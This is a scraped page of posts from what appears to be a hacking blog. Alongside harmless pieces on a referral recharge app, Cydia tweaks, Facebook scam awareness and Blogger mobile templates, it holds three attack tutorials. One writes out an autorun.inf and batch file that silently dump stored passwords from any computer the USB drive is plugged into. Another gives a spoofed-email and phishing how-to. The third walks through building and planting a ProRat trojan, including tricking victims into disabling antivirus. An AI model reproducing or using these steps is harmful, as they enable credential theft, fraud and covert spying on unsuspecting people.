For more Knowledge about technology and science visit... click here

Recharge Your mobile free thriugh Facebook


HI FRENDZ,THIS IS A NEW RECHARGE TRICK. ACYUALLY IT IS NOT A TRICK. ITS A LEGAL ACTIVITY WHICH GIVE ATLEAST OF RS.100/- IN TWO DAYS.

NOW, I STARTED THIS B4 4 DAYS..AND NOW I GOT TOTAL RS.100 IN MY IDEA MOBILE. WE CAN RECHARGE ANY OPERATOR/NETWORK NUMBER AS OUR WISH..

lets start it here,b4 u start all are needed the followings..

1.Facebook Account

2.Real mobile number

3.PC

and a few chunks of your brain also. Embee is a facebook application that’s why you need to have a facebook account.

* Login with your facebook account.

* Then go to this link:

CLICK HERE

Start using Embee Mobile Now!. Install the application.

* Next, verify your number. (cant be done on mobile)

* Verify email. (cant be done on mobile too)

* After doing that, you automatically will have a total of 50 embee points.

* Click on Redeem Tab and complete offers for points.

* Invite friends so you can also have Invite Bonus.

AT FIRST U NEED TO GET 150 POINTS FOR 50RS

and 300 points e 100 rs..RECHARGE...

so invite many freinds and point to be collect and free recharge.

read more "Recharge Your mobile free thriugh Facebook"

Stealing Passwords Using USB drive


Here, I come with a new cool way to hack passwords physically, it means that physical approach matters a lot for using this method. We will use a usb and some applications to hack stored passwords in any computer. As we know now-a-days people sign up at large number of websites and to remember them all they store their passwords in the computer.

We will try recovering them automatically using a USB drive. Yes, All we need is to plug the USB in any port. This trick will work for Windows 7, Windows Xp, Windows 2000 and Windows Vista also. All the applications included are light enough and very portable that these can be pasted and downloaded in the USB disk in few seconds. You can also hack stored messenger passwords. It will help you if you are using a school combined computer or an official may be. Lets start the tutorial:
 
Here are the applications which you will need:

Messen Pass - MessenPass is a password recovery tool that reveals the passwords of the many instant messenger applications as i have already created post over it.

Mail Passview
- Mail PassView is a small password-recovery tool that reveals the passwords and other account details for the following email clients : Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts), Windows Mail, Windows Live Mail, IncrediMail, Eudora, Netscape 6.x/7.x (If the password is not encrypted with master password), Mozilla Thunderbird (If the password is not encrypted with master password), Group Mail Free, Yahoo! Mail - If the password is saved in Yahoo! Messenger application, Hotmail/MSN mail - If the password is saved in MSN/Windows/Live Messenger application, Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.

IE Passview
- As the name tells that it will be used to recover and hack all the passwords stored in the internet explorer.  It supports all new and old versions.

Protected Storage PassView - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are revealed by reading the information from the Protected Storage.
Starting from version 1.60, this utility reveals all AutoComplete strings stored in Internet Explorer, not only the AutoComplete password, as in the previous versions.


PasswordFox - PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

So, I think you will wonder that what else is left to be attacked, Yes, Its a complete attack. What is requires is physical access. After downloading all the files extract them.


1)
After extracting all the five tools, Copy only *.exe files in the USB drive. i-e copy the files mspass.exe,mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe

2)
Create a new notepad document and write following lines in it:
[autorun] open=launch.bat ACTION= Perform a virus scan
 After that save it as autorun.inf and now copy this file to USB drive.

3)
After that again open notepad and paste this in it:
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt
Save it as launch.bat and copy this into your USB drive.

How to Use this USB drive?

Now your toolkit is ready and you are all set to steal the passwords. You can use this pendrive on any computer to steal the stored passwords. Just follow these steps:

1) Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).


2) In the pop-up window, select the first option (Perform a virus scan).


3) Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .txt files.


4) Remove the pendrive and you’ll see the stored passwords in the .txt files.
read more "Stealing Passwords Using USB drive"

25 Best Cydia Apps

Cydia is a software application for iOS allowing the user to find and download applications and software packages that are compatible with jailbroken iPhones, iPod Touch or iPad. Cydia is developed by Jay Freeman well known as “Saurik”, you can choose a wide range of applications from the Cydia repository as most of them are free.

Here is a collection of few of those,
1. Wi-Fi Sync:
This enables synchronization of iTunes using Wi-Fi connectivity solutions. With these Wi-Fi connectivity solutions, you should be able to transfer files, games and folders, in ease from anywhere, in car, bed or shed. Wi-Fi synchronization once set sorts the problem and makes this synchronization automatic.
Download: Wi-Fi Sync
2. Infinifolders:
This is one of the newest tweak that is known as Infinifolders, which as the name suggests provides you with an infinite number of apps, and has the newly incorporate feature of vertical scrolling to browse through your folders. This is a very useful app for categorizing folders into categories and consolidate same category into a single big folder.
Download: Infinifolders
3. Overboard:
This is an overview of Springboards pages and jumps, which supports a number of WinterBoard themes, advanced customization with multi tasking accessibility for activating more than one task at a single moment and also now features an extended Springboard.
Download: Overboard
4. Safari Download Manager:
Safari download manager is one of the powerful extensions that add a powerful and highly configurable download manager, which is specially meant for iPhone’s web browser. This plug-in has the power to harness the maximum potential of pleasuresome browsing experience and network connectivity using your device.
Download: Safari Download Manager
5. Cydelete:
While you have been downloading a number of apps from Cydia following jailbreaking the device, sometimes you will find that some of the softwares are not friendly and you do not want them anymore, but will find that the process of deleting the apps takes seven steps before being erased, probably a punishment for jailbreaking. But this is no more an issue, that Cydelete is the one that can remove the installed apps by pressing on the app icon that you want to delete and press or tap the X alphabet, that you will be able to delete any app that is downloaded using Cydia only.
Download: Cydelete
6. Covert:
A new tweak from Chpwn, a developer has designed this tweak, which works like the incognito window of Google Chrome that which enables you to do private browsing on iPhone and iPod Touch when jailbroken and is installed via Cydia directly on being downloading the jailbreaking software. This comes with no cost and will not be remembering or allow the storage of history of web page URL, cookies, browsing sessions, passwords, cookies, cache and forms.
Download: Covert
7. Ipic my contacts:
This small app from Cydia following the jailbreaking of the iPhone or iPod Touch or iPad, will let you to display the contact picture next to the name of the contacts and also allows to perform instant search for placing a small icon next to the contact. All you have to do is no uploading business by merely clicking on the place where you want to place the new icon.
Download: Ipic my contacts
8. Facebreak:
With iPhone there has been the possibility of making FaceTime calls via Wi-Fi only, that you will find now that Facebreak is a tweak for jailbroken phones that will be enabled to make face time real-time calls using 3G as well. What is good about this software is that this tweak do not need any extra installation effort and comes along with Cydia while jailbreaking the iPhone.
Download: Facebreak
9. Mark read:
Well, you are sure to use this app on your jailbroken iPhone with Cydia, when you find yourself the emails turning out to undaunting to manage. Then there is a way that you will find yourself by using the Mark Read app with which you can mark all those emails that do not require any attention at all as read emails, and read only the important emails, instantly or later when convenient.
Download: Mark Read
10. Snap tap:
This app makes the best use of the volume control buttons to take a picture and was the one that was initially released. Now you have something that you can do more with this app like taking even videos using the volume control and headset buttons, capture images using the Cycorder or the built-in 3G cameras, mute shutter, taking self-portrait and normal usage when not taking picture or videos.
Download: Snap Tap
11. Nolock Screen:
This is one of the best apps that comes in real handy by disabling the “slide to unlock” feature and if you are not using the passcode or pending messages, then this will easily skip the lockscreen in no time for unlocking the phone. This tweak plays attractively with a small animation while doing this job.
Download: NoLock Screen
12. Mobile Volume Sound:
This is a tweak that can adds sounds by pressing the volume up or down buttons via your iPhone and works very well on versions from 3.0 onwards.
Download: Mobile Volume Sound
13. Locktopus:
This is a new application that can lock your individual applications with your password, making iPhone less vulnerable to document thefts and personal identity information release. This is being considered as one of the safest and most effective mode of application that can lack any apps that you use on your iPhone, enabling you to carry with your iPhone some confidential information in an easy manner.
Download: Locktopus
14. secretSMS:
Cydia has released an application using which you can send secret sms, which will not be available or known to anyone and can be read only by the intend user. This is a very professional and useful app but requires internet connection to use this app.
Download: secretSMS

15. Recent Delete:
This is an additional feature for the jailbroken iPhone using Cydia, which enables the mobile phone recent deletes extension, and individual calls could be deleted from the recent call lists. An advantage of this app is does not require installation or storage space, rather works as a plug-in.
Download: Recent Delete
16. Installous:
This being one of the top most applications that can be easily downloaded from Cydia and is capable of finding all applications that ends with *.ipa format in the iPhone, which in turn reveals many hidden secrets of the iPhone. This is a systematic installation that could be done better only on the iPhone, and so follow the link to get the necessary guidelines.
Download: Installous
17. Reminder:
Well when there are a number of apps to remind you on a task, I thought I will take the Remind Me Later as one of the reminder apps, which aids in putting your iPhone on snooze button for remind you on a later time, once in every 5 minutes until you complete the previous task and decide to move to the next task without missing. In short, adds snooze buttons to calendar reminders.
Download: Reminder

18. iProtect:
You can now protect your jailbroken iPhone with a password or by using a SIM control mechanism, with this small anti-theft system.
Download: iProtect
19. WinterBoard:
WinterBoard is an application for Graphic artists to create anything they want into themes for Apple OS, and also allows multiple downloading of theme packages by simply dragging them into the theme folders.
Download: WinterBoard
20. Signal:
This app is for managing the cell towers in your current location on a map and will allow you to choose the best that can provide maximum coverage and uninterrupted service.
Download: Signal
21. Folder Enhancer:
This remarkable app is made to open folders faster and can add up to nearly 320 icons and allows to create folders inside folders like a PC and also gives access to create folder while docking.
Download: Folder Enhancer
22. Enhanced tabs:
This app is made exclusively for Safari web browser to enhance the browsing experience with increased versatility.
Download: Enhanced tabs
23. Full Screen For Safari:
This is a powerful app with a number of features like a real multi touch browser, new gestures and actions making Safari a real intuitive and cool web browser for iPhone.
Download: Full Screen For Safari
24. qTweeter:
This is the fastest, coolest and most efficient way to tweet and work using your twitter account, and use in conjunction the Facebook account. There is much more that you can do with this app on both the prominent websites, Twitter and Facebook.
Download: qTweeter
25. Quick Reply:
This is an easy to use application to send quickly a reply to messages is a much easier and faster manner.
Download: Quick Reply
Comments are always appreciated!!
read more "25 Best Cydia Apps"

Sending Fake/Spoofed Emails (How to guide and Purpose)

A large number of people are using these fake emails utility to fool and fraud with innocent people but I will show you today that how Hackers make it possible and what they want to do by using these emails. Purposes are large but i will discuss some of the common purposes here. Also i will show you many online free service which will allow you to send these fake emails. Similarly how can we make such service at our own. So, Fake emails can be sent from:

1. Using Any Free or premium online fake email service (There are million like this)
2. Sending Such emails by using a php script. (You can make your own)

So, lets discuss these first:
1) Using Fake Email Services:
There are many online free as well as premium services to send fake emails from any address you want with any name used and also with any content to be attached with email. Premium services will give you more options but free can also be used. Here are two fake email senders:
AnonyMailer>>Free Fake Email - Send Fake Mail Pranks Anonymously for Free
Emkei Fake Mailer>>Free Fake email with more options-Attachments also

Search at Google.com>> Free Fake email Services, You will get many.

2) Using Fake Email php Script:
Download the script for sending Fake Emails from here.
(Alternalte download here)
You will need a hosting not ordinary one this script will work on such hosting which allows to send emails.
One of them is x10hosting.com other you may use is 000webhost.com. Further search google.
Make account at above hosting any of the one and upload you script.
Now navigate to, www.youweb.com/sendmail.php and Just fill the fields and send emails.
>>A paid hosting is good for this purpose.
Note: Don't use this to spam. Hackers Thirst is not responsible for bad usage of this script.

To learn how to upload your files to free or paid hostings go here.

Why Hackers Use Fake Emails?
a) The main reason is fraud. They can fool you by using your boss email id and sending a warning that do this or else you will be fired. etc.
b) Can be used to hack your social email acounts. or gmail account lets say. See pic below, A hacker is sending Fake email:

Now the hacker is trying to fool victim by hyperlinking his phishing page (of gmail) link. Since, now people know that www.gmail.anyweb.com will be fraud page. So, Hackers Use some common social engineering Tips. Now when i will click the link i won't see url in browser (Common Browsing Attitude) since i want to get my donation (As early as possible), therefore i will login and will loose my password. For detailed information on Phishing read these articles:

Further you have common sense you can estimate that how these fake emails can be used. So, Always be sharp enough to catch such emails and always look at browser URL after clicking such links like login from here etc. Well practically, Why someone will ask you to login to Gmail, Yahoo, Msn or facebook from an email?
Think......
read more "Sending Fake/Spoofed Emails (How to guide and Purpose)"

Common Facebook Scams and How to Avoid Those

The rise of social media has unsurprisingly brought with it a number of different online scams. Nowadays the scams are much more sophisticated than the famous Nigerian scams and can be quite hard to detect as well. What makes these types of scams even more damaging than the traditional email based techniques is that people tend to trust the links they receive from their friends. Additionally, social media makes the hackers’ job easier by providing a convenient means to spread the infection virally, instead of having to rely on lists of email addresses.



These people will stoop to any level to get you to bite by posing as innocents, hacking your friends’ accounts and using them against you, and hiding malicious links. No amount of attentiveness can protect you 100% from these attacks, but by staying abreast of them you can minimize your risk. This article covers some of the more common scams in use on Facebook today.
Click-Jacking / Like-Jacking / Status-Jacking:
Although these types of scams aren’t exactly the same, I put them together due to their similarity. Actually, Like-Jacking and Status-Jacking are really specific types of Click-Jacking attacks. Click-Jacking is a type of scam where a clickable button in your web browser performs some other function than the one intended, such as installing malware on your pc.
The Like-Jacking scam is commonly being linked with a fake video of a “teacher” wearing an outfit that has her back-end exposed. When you follow the link to watch the video, clicking anywhere on the video will cause you to “Like” it, posting a link to the fake webpage onto your Facebook wall. If you’ve fallen victim to this type of hoax you can click on the “x” at the top of the post and select “Remove and Unlike”.
Status-Jacking is more malicious, it is when your account is compromised and a hacker has gained access to your login credentials. This can arise from a Click-Jacking scheme, but there are other ways in which hackers can gain access to your account. There are several important measures you can take to protect yourself from this type of attack.
• Maintain up-to-date Antivirus software on your computer.
• Make sure that your home network is secured, especially if it is wireless.
• Maintain tight privacy settings in Facebook and regularly check that they are up-to-date.
• Log out of Facebook after you are done if you are using a shared computer.
• Don’t add friends that you don’t know.


Free Gold for Games / Free Facebook Credits:
Often these types of scams will have you “Like” a Facebook profile that has been compromised. There are literally hundreds of these types of pages on Facebook, and the risk runs anywhere from simple tracking malware to full blown Status-Jacking. Like everything else on the internet, if something is being advertised as being free, chances are it’s a scam.
Do Not Accept Friend Requests Hoax:
Although the “Do Not Accept Friend Requests” type of hoax is the most recent, there are a ton of these types of scams out there. They all ask you to repost some information that is potentially embarrassing. There are some legitimate viral marketing campaigns that make use of social media in this way, but if the post seeks to defame others, it is probably a hoax. Although this isn’t as malicious as some of the other hoaxes, it could damage your reputation and that of others.
Dislike Button Hoax / Trojan Horse Style Attacks:
These types of scams purport to be some kind of useful or humorous third party software or plug-in you can download and install. Often they have a survey that comes along with them that may attempt to illegally gather more information about you. When you do install the software it may appear to function as intended, but malware is installed as well. There are some easy common sense rules to follow in order to prevent falling victim to this type of scam.
• Don’t click on any links from friends that seem uncharacteristic of them. If grandma is gushing over Justin Bieber’s newest haircut, chances are her account has been compromised and the link contains malware. Unless of course your grandmother happens to like Justin Bieber.
• Pay attention to the source of the post. If it was posted from the web, you will see “via Facebook” text at the bottom of the post. If that text says something that sounds fishy, chances are it’s a scam.
• Don’t trust external websites that invite you to download something. If you’re unsure whether something is a hoax or legit, just play it safe and don’t click on it.
Comments are always appreciated!!
Please do share if you liked the post!!
read more "Common Facebook Scams and How to Avoid Those"

Make your blog attractive for mobile users

Did you know more people use the Mobile Internet than the Standard Internet ? In a survey by the IDC (Interactive Data Corp) it was revealed there will be over 1 Billion people using the mobile Internet by 2013.The number of mobile Internet users passed the number of 'Desk Top' computer users in 2008.And now with a fantastic new Blogger feature you can take full advantage of this and make your blog fully interactive for these users.Until now you had some options to make your blog "Mobile Friendly" but with Blogger Mobile Templates your blog will be fully functional on Mobile Devices.Below i will show you an easy way to enable it.

 Below is said by blogger team:

"...We know many of you like to view blog posts on your smart phones. However, it can be difficult at times because of the small screen size. This is why we are excited to announce our first launch of mobile templates! Initially available as opt-in functionality on Blogger in Draft, mobile templates will re-format your blogs for smart phones to enhance your readers’ viewing experience. In order to activate mobile templates, simply go to Dashboard > Settings > Email & Mobile tab, enable the mobile template option and then save settings..." - Blogger In Draft

How to enable your mobile template for your own blog:

Like all new features Mobile Blogger Template are at first only available in Blogger In Draft.Follow this link and log in to your Blogger Account in
Blogger In Draft.

Go To Your Settings > Email & Mobile > Mobile Template.






 Tick the "Yes, On mobile devices, show the mobile version of my template." option and don't forget to scroll to the bottom of the page and Save.

So, blogger will automatically detect mobile users and will show them the mobile view of your blog. It will also load quickly then the whole html page and will also be supported to small mobile users. Blogger has took this step with great wisdom i liked it and hope my reader will also like it.
Drop comments if you have nay questions. 
read more "Make your blog attractive for mobile users"

Pro Rat Trojan - Spy Others Computer (Hack Facebook, Twitter Passwords)





Today you will learn in this post to make pro rat trojan. Using which you will be able to hack the whole victim computer including all the Facebook, twitter and other email id's saved passwords. Seems interesting so lets start!



What Is Pro Rat Trojan ?

In short,Pro rat trojan is the type of trojan which uses it's spying ability to spy in your victims computer and let you control it.

Making Of Pro Rat Trojan:

Generally there are lot of ways to make pro rat trojan but I shall teach you the easiest way to make it . Things you need for it are given:
Log onto no-ip.com and get registration there with an account .(I leave this easy part on you, As you might have experience of signing up)

Now download their Dns update client . Run it and by the help of it update your hostname and save it

Now we will PING on our host to check whether our host ip has been associated with the chosen server or not.


WHAT IS PING ?

It is the good question . Ping is a program that sends a series of packets over a network or the Internet to a specific computer in order to generate a response from that computer. The other computer responds with an acknowledgment that it received the packets. Ping was created to verify whether a specific computer on a network or the Internet exists and is connected.

Back to the point.

Go to RUN and enter CMD in it . A window will pop out , it is the command prompt well you can guess it's work from it's name . Now enter in it PING *NAME OF YOUR HOSTNAME*
,press enter and it would reply with your ip .

After ensuring it that you have been connected to chosen server move to the folder where you have installed the pro rat and open pro rat.exe . A window will pop out , now refer to the photo given bellow .

Click on creat and then click on create pro rat server as given . Now for a window will open and will take necessary information refer to another photo given bellow .

After filling the options click on Create Server and your server would be ready to give out to your victim . Attach it to the file or directly give it to your victim . I left it on you.

Note: You can use many social engineering tricks to send the file to the victim. You may also ask the victim to turn of antivirus its a new game. Later I shall post about how to hide your server from antivirus.

When the victim will run the server , Open the pro rat again and goto pro connectivity and click on the button given bellow more refer to the photo:
 

 


Thus you can do lots of things using it. You can log all the keys pressed by victim, can take screen shots of his pc. And Much more.

Countermeasures Against Trojan :
Only way to safe your computer from trojan is to keep your computer up to date with the antivirus and use AVG, Norton antivirus or our free NOD . There is the best way install process explorer which let you see trojans in your computer and to reverse them .
 
read more "Pro Rat Trojan - Spy Others Computer (Hack Facebook, Twitter Passwords)"
 
Go to Top